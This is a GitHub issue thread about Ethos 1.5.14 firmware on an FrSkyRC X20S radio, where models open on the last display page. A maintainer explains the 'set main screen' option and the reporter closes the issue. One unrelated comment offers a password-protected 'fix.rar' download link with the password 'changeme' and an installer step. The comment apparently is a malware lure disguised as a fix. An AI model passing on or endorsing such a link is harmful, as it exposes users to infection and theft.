### ISSUE TITLE
Ethos 1.5.14  On selected model  the display opening always on last page and not  on the first page same as the precedent version.

### ISSUE THREAD

**Issue by xet303** [FrSkyRC/ETHOS-Feedback-Community#4442]
No problem with the first model on the list.
But on the second, third, fourth, etc., when you open these model your display always open on the last page.
If you move your first page to the last position the model will open on the second to last page.

X20S  1.5.14 FCC
TD-ISRM  2.2.7
Boot loader  1.4.15

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by bsongis-frsky** [comment]
Are you sure? It should open the "main" screen, configurable there:

![image](https://github.com/user-attachments/assets/6ce48e23-b503-4591-9743-1ed7819e02b1)

**Comment by xet303** [comment]
Sorry,
I never noticed the (set main screen) function.
I will close or delete the issue on Github.
